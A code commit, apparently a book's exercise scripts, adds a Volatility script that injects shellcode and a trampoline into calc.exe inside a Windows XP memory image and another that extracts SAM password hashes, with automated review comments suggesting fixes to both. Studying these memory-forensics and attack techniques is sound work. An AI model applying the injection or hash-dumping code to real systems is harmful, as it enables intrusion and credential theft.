
Commit 9102359

I eventually finished the book, I'm so happy. Thanks to the people who encouraged me
1 parent 5dfedc5 commit 9102359


1,383 files changed

+583744
-0
lines changed

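--- /dev/null
+++ b/PATH_NOT_SHOWN_dumpit_readme
@@ -0,0 +1,14 @@
+- MoonSols Windows Memory "DumpIt" v1.3.2.20110401 -
+
+Copyright (C) 2010 - 2011, Matthieu Suiche <http://www.msuiche.net>
+Copyright (C) 2010 - 2011, MoonSols <http://www.moonsols.com>
+
+All executables and drivers are NOT redistributable, and licence applies only to one single
+user. Reverse engineering is prohibited.
+
+You are experiencing any problems contact us at : support@moonsols.com
+
+
+This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
+The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
+Perfect to deploy the executable on USB keys, for quick incident responses needs.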
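--- /dev/null
+++ b/code_inject.py
@@ -0,0 +1,114 @@
+#-*- coding:utf8 -*-
+
+"""
+@version:
+@author: giantbranch
+@file: code_inject.py
+@time: 2016/3/16 13:04
+"""
+
+import sys
+import struct
+
+equals_button = 0x01005D51
+
+# 要分析的内存文件位置
+memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
+slack_space = None
+trampoline_offset = None
+
+# 读入我们的shellcode
+sc_fd = open("cmeasure.bin", "rb")
+sc = sc_fd.read()
+sc_fd.close()
+
+sys.path.append("D:\\volatility-2.3")
+
+import volatility.conf as conf
+import volatility.registry as registry
+
+registry.PluginImporter()
+config = conf.ConfObject()
+
+import volatility.commands as commands
+import volatility.addrspace as addrspace
+
+registry.register_global_options(config, commands.Command)
+registry.register_global_options(config, addrspace.BaseAddressSpace)
+
+config.parse_options()
+config.PROFILE = "WinXPSP3x86"
+config.LOCATION = "file://%s" % memory_file
+
+import volatility.plugins.taskmods as taskmods
+
+p = taskmods.PSList(config)
+for process in p.calculate():
+if str(process.ImageFileName) == "calc.exe":
+print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
+print "[*] Hunting for physical offsets...please wait."
+
+address_space = process.get_process_address_space()
+pages = address_space.get_available_pages()
+
+# page[0]:页面地址
+# page[1]:页面大小
+for page in pages:
+physical = address_space.vtop(page[0])
+if physical is not None:
+fd = open(memory_file, "r+")
+fd.seek(physical)
+buf = fd.read(page[1])
+
+try:
+offset = buf.index("\x00" * len(sc))
+slack_space = page[0] + offset
+
+print "[*] Found good shellcode location!"
+print "[*] Virtual address: 0x%08x" % slack_space
+print "[*] Physical address: 0x%08x" % (physical + offset)
+print "[*] Injecting shellcode."
+
+fd.seek(physical + offset)
+fd.write(sc)
+fd.flush()
+
+# 创建我们的跳转代码
+# 对应的汇编指令为:
+# mov ebx, ADDRESS_OF_SHELLCODE( shellcode地址)
+# jmp ebx
+tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
+tramp += "\xff\xe3"
+
+if trampoline_offset is not None:
+break
+
+except:
+pass
+
+fd.close()
+
+# 查看目标代码的位置
+if page[0] <= equals_button and equals_button < (page[0] + page[1] -7):
+print "[*] Found our trampoline target at: 0x%08x" % (physical)
+# 计算虚拟偏移
+v_offset = equals_button - page[0]
+# 计算物理偏移
+trampoline_offset = physical+ v_offset
+
+print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
+
+if slack_space is not None:
+break
+
+
+print "[*] Writing trampoline..."
+
+fd = open(memory_file, "r+")
+fd.seek(trampoline_offset)
+fd.write(tramp)
+fd.close()
+
+print "[*] Done injecting code."
+
+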
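Review bot: The bare `except:` at line 86 swallows every exception raised in the block, not only the ValueError that `buf.index` raises when the page holds no run of zero bytes, so an I/O failure on the write at lines 72-74 is silently lost; narrow it to `except ValueError:`. Independently, `trampoline_offset` stays `None` when no page contains `equals_button`, and `fd.seek(trampoline_offset)` at line 108 then fails with a TypeError after the image has already been modified at line 73; add `if trampoline_offset is None: sys.exit("[*] Trampoline target not found.")` before line 107. The image is opened with mode `"r+"` (lines 59 and 107) on a Windows path, where text-mode reads and writes translate line endings and make the offsets derived from `buf` unreliable; the mode should be `"r+b"` to match the `"rb"` used for `cmeasure.bin` at line 21. Because every run modifies the image in place, the input should be a forensic working copy rather than the original acquisition, and that expectation is worth stating in a comment next to `memory_file` at line 16.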
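--- /dev/null
+++ b/codecoverage.py
@@ -0,0 +1,37 @@
+#-*- coding:utf8 -*-
+
+"""
+@version:
+@author: giantbranch
+@file: codecoverage.py
+@time: 2016/3/15 23:15
+"""
+
+from immlib import *
+
+class cc_hook(LogBpHook):
+
+def __init__(self):
+LogBpHook.__init__(self)
+self.imm = Debugger()
+
+def run(self, regs):
+self.imm.log("%08x" % regs['EIP'], regs['EIP'])
+self.imm.deleteBreakpoint(regs['EIP'])
+return
+
+
+def main(args):
+
+imm = Debugger()
+
+calc = imm.getModule("calc.exe")
+imm.analyseCode(calc.getCodebase())
+
+functions = imm.getAllFunctions(calc.getCodebase())
+
+hooker = cc_hook()
+for function in functions:
+hooker.add("%08x" % function, function)
+
+return "Tracking %d functions." % len(functions)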
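Review bot: The result of `imm.getModule("calc.exe")` at line 28 is used without a check, so when that module is not loaded in the debugged process the call at line 29 fails with an AttributeError instead of a readable message; add `if calc is None: return "calc.exe is not loaded."` before line 29 (this assumes getModule reports a missing module by returning None, which should be confirmed against the immlib API). `calc.getCodebase()` is evaluated twice, at lines 29 and 31; binding it once as `codebase = calc.getCodebase()` reads better. The bare `return` at line 21 of `run` is redundant, and `from immlib import *` at line 10 hides which names (`LogBpHook`, `Debugger`) the script depends on, so importing those two explicitly would document the dependency.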
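--- /dev/null
+++ b/grabhashes.py
@@ -0,0 +1,70 @@
+#-*- coding:utf8 -*-
+
+"""
+@version:
+@author: giantbranch
+@file: grabhashes.py
+@time: 2016/3/15 20:16
+"""
+
+import sys
+import struct
+import volatility.conf as conf
+import volatility.registry as registry
+
+# 要分析的内存文件位置
+memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
+
+# volatility的下载的路径
+sys.path.append("D:\\volatility-2.3")
+
+registry.PluginImporter()
+config = conf.ConfObject()
+
+import volatility.commands as commands
+import volatility.addrspace as addrspace
+
+config.parse_options()
+config.PROFILE = "WinXPSP3x86"
+config.LOCATION = "file://%s" % memory_file
+
+# 注册全局参数
+registry.register_global_options(config, commands.Command)
+registry.register_global_options(config, addrspace.BaseAddressSpace)
+
+from volatility.plugins.registry.registryapi import RegistryApi
+from volatility.plugins.registry.lsadump import HashDump
+
+# 实例化一个RegistryApi类对象(包含常用的注册表帮助类)
+registry = RegistryApi(config)
+# 等同与hivelist命令
+registry.populate_offsets()
+
+sam_offset = None
+sys_offset = None
+
+# 循环检索SAM和system键值
+for offset in registry.all_offsets:
+if registry.all_offsets[offset].endswith("\\SAM"):
+sam_offset = offset
+print "[*] SAM: 0x%08x" % offset
+
+if registry.all_offsets[offset].endswith("\\system"):
+sys_offset = offset
+print "[*] System: 0x%08x" % offset
+
+if sam_offset is not None and sys_offset is not None:
+config.sys_offset = sys_offset
+config.sam_offset = sam_offset
+
+# 创建HashDump对象
+hashdump = HashDump(config)
+
+for hash in hashdump.calculate():
+print hash
+
+break
+
+
+if sam_offset is None or sys_offset is None:
+print "[*] Failed to find the system or SAM offsets."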
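Review bot: `import volatility.conf` and `import volatility.registry` at lines 12-13 execute before `sys.path.append("D:\\volatility-2.3")` at line 19, so unless volatility is already importable the script stops with an ImportError before the path is ever added; move the `sys.path.append` above those imports, as code_inject.py in this same commit does. Line 39 then rebinds the name `registry` from the `volatility.registry` module to a `RegistryApi` instance, so the module cannot be referenced afterwards; a distinct name such as `reg_api = RegistryApi(config)` avoids the shadowing. The loop variable `hash` at line 63 shadows the builtin of the same name, and `struct` is imported at line 11 but never used.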
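--- /dev/null
+++ b/PATH_NOT_SHOWN_package_init
@@ -0,0 +1 @@
+all = ["immutils"] #for now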
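Review bot: `all = ["immutils"]` at line 1 assigns a plain module attribute that shadows the `all` builtin; the name Python consults for `from package import *` is `__all__`, so this line has no effect on wildcard imports. Change it to `__all__ = ["immutils"]  # for now`. The file's path is not shown on this page; the content reads as a package `__init__.py`.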
